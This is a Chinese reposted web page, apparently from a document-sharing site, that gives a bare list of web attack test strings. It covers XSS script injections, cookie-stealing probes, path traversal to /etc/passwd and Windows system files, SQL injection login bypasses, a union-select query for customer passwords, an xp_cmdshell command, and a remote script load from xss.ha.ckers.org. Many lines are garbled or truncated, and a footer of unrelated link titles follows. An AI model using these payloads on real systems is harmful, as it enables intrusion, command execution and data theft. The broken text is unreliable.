XSS攻击测试语句大全s

来源:百度文库 编辑:神马文学网 时间:2024/04/29 15:00:48

XSS测试语句大全

[ 2006-07-21 22:32:15 | 作者: 承諾 ] >
=‘>


%3Cscript%3Ealert(‘XSS‘)%3C/script%3E


%0a%0a.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(‘Vulnerable‘);</script>

sql_debug=1
a%5c.aspx
a.jsp/
a/
a?
">
‘;exec%20master..xp_cmdshell%20‘dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt‘--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
‘‘;!--"=&{()}










"";‘ > out



























getURL("javascript:alert(‘XSS‘)")
a="get";b="URL";c="javascript:";d="alert(‘XSS‘);";eval(a+b+c+d);

"> <"







PT SRC="http://xss.ha.ckers.org/a.js">
link
admin‘--
‘ or 0=0 --
" or 0=0 --
or 0=0 --
‘ or 0=0 #
" or 0=0 #
or 0=0 #
‘ or ‘x‘=‘x
" or "x"="x
‘) or (‘x‘=‘x
‘ or 1=1--
" or 1=1--
or 1=1--
‘ or a=a--
" or "a"="a
‘) or (‘a‘=‘a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi‘ or 1=1 --
hi‘ or ‘a‘=‘a
hi‘) or (‘a‘=‘a
hi") or ("a"="a
XSS攻击测试语句大全s XSS攻击 XSS攻击 Kallahar‘s Place: PHP XSS (cross site scripting) filter function 2007十大Web安全漏洞 跨站脚本攻击XSS居首 MatrixPedia: XSS 苏俄攻击型核潜艇大全 SQL语句大全 史上最经典语句大全 人生经典语句大全 经典伤感语句大全 伤感语句大全 经典伤感语句大全``` 经典伤感语句大全 史上最经典语句大全 人生经典语句大全 VB语句使用大全 经典伤感语句大全 2007年最经典语句s XSS 0DAY XSS 0DAY 服务器系统平台的渗透测试中的攻击与防守 服务器系统平台的渗透测试中的攻击与防守 测试工具大全